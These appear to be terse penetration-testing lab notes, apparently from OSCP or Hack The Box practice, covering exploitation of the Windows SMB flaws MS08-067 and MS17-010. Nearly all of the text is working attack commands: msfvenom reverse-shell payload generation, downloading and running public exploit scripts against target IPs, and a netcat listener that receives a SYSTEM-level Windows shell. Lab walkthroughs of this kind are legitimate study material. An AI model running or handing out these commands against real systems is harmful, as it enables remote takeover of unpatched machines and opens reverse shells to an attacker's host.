**exploit SMB VULN MS08-067**
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.26 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
on copie le shellcode dans le commentaire
python ms08-067.py 10.10.10.4 6 445
root@kali:~/OSCP/VMs/10.10.10.4/MS17-010# netcat -lnvp 443
listening on [any] 443 ...
C:\WINDOWS\system32>
**exploit SMB VULN MS017-10**
git clone https://github.com/SecureAuthCorp/impacket
cd impacket/
pip install .
git clone https://github.com/helviojunior/MS17-010.git
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.26 LPORT=443 -f exe -o ms17-010.exe
git clone https://github.com/helviojunior/MS17-010.git
python send_and_execute.py 10.10.10.160 ms17-010.exe
root@kali:~/OSCP/VMs/10.10.10.4/MS17-010# netcat -lnvp 443
listening on [any] 443 ...
C:\WINDOWS\system32>